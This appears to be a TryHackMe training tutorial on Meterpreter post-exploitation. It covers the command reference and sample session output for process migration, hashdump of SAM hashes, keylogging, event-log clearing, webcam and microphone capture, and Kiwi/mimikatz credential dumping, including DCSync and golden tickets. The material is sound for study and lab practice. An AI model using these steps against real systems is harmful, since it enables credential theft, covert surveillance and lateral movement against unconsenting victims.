meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel[...]
Every version of Meterpreter will have different command options, so running the help command is always a good idea. Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.
Meterpreter will provide you with three primary categories of tools:
- Built-in commands
- Meterpreter tools
- Meterpreter scripting
If you run the help command, you will see Meterpreter commands are listed under different categories.
- Core commands
- File system commands
- Networking commands
- System commands
- User interface commands
- Webcam commands
- Audio output commands
- Elevate commands
- Password database commands
- Timestomp commands
Please note that the list above was taken from the output of the help command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp). These will be different for other Meterpreter versions.
Meterpreter commands Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started.
Core commands
background: Backgrounds the current sessionexit: Terminate the Meterpreter sessionguid: Get the session GUID (Globally Unique Identifier)help: Displays the help menuinfo: Displays information about a Post moduleirb: Opens an interactive Ruby shell on the current sessionload: Loads one or more Meterpreter extensionsmigrate: Allows you to migrate Meterpreter to another processrun: Executes a Meterpreter script or Post modulesessions: Quickly switch to another session
File system commands
cd: Will change directoryls: Will list files in the current directory (dir will also work)pwd: Prints the current working directoryedit: will allow you to edit a filecat: Will show the contents of a file to the screenrm: Will delete the specified filesearch: Will search for filesupload: Will upload a file or directorydownload: Will download a file or directory
Networking commands
arp: Displays the host ARP (Address Resolution Protocol) cacheifconfig: Displays network interfaces available on the target systemnetstat: Displays the network connectionsportfwd: Forwards a local port to a remote serviceroute: Allows you to view and modify the routing table
System commands
clearev: Clears the event logsexecute: Executes a commandgetpid: Shows the current process identifiergetuid: Shows the user that Meterpreter is running askill: Terminates a processpkill: Terminates processes by nameps: Lists running processesreboot: Reboots the remote computershell: Drops into a system command shellshutdown: Shuts down the remote computersysinfo: Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu)
idletime: Returns the number of seconds the remote user has been idlekeyscan_dump: Dumps the keystroke bufferkeyscan_start: Starts capturing keystrokeskeyscan_stop: Stops capturing keystrokesscreenshare: Allows you to watch the remote user's desktop in real timescreenshot: Grabs a screenshot of the interactive desktoprecord_mic: Records audio from the default microphone for X secondswebcam_chat: Starts a video chatwebcam_list: Lists webcamswebcam_snap: Takes a snapshot from the specified webcamwebcam_stream: Plays a video stream from the specified webcamgetsystem: Attempts to elevate your privilege to that of local systemhashdump: Dumps the contents of the SAM database
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.
Post-Exploitation with Meterpreter
Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.
Help This command will give you a list of all available commands in Meterpreter. As we have seen earlier, Meterpreter has many versions, and each version may have different options available. Typing help once you have a Meterpreter session will help you quickly browse through available commands.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel[...]
Meterpreter commands
The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. Are you an admin level user like NT AUTHORITY\SYSTEM or a regular user?)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
The ps command will list running processes. The PID column will also give you the PID information you will need to migrate Meterpreter to another process.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 644 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
428 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM
548 540 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
596 540 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
604 588 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
644 588 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
692 596 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
700 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
716 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
724 596 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
764 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM
828 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM
864 828 WmiPrvSE.exe
900 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
952 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1076 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1164 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1168 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1244 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1276 1304 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
1304 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1340 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1388 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe[...]
Migrate
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.
To migrate to any process, you need to type the migrate command followed by the PID of the desired target process. The example below shows Meterpreter migrating to process ID 716.
meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter >
Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
Hashdump
The hashdump command will list the content of the SAM database. The SAM (Security Account Manager) database stores user's passwords on Windows systems. These passwords are stored in the NTLM (New Technology LAN Manager) format.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
While it is not mathematically possible to "crack" these hashes, you may still discover the cleartext password using online NTLM databases or a rainbow table attack. These hashes can also be used in Pass-the-Hash attacks to authenticate to other systems that these users can access the same network.
Search
The search command is useful to locate files with potentially juicy information. In a CTF context, this can be used to quickly find a flag or proof file, while in actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.
meterpreter > search -f flag2.txt
Found 1 result...
c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >
Shell The shell command will launch a regular command-line shell on the target system. Pressing CTRL+Z will help you go back to the Meterpreter shell.
meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Post-Exploitation
Meterpreter provides several important post-exploitation tools.
Commands mentioned previously, such as getsystem and hashdump will provide important leverage and information for privilege escalation and lateral movement. Meterpreter is also a good base you can use to run post-exploitation modules available on the Metasploit framework. Finally, you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!
meterpreter >
The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.
- Gathering further information about the target system.
- Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
- Privilege escalation.
- Lateral movement.
Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
These will change according to the loaded menu, so running the help command after loading a module is always a good idea.
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)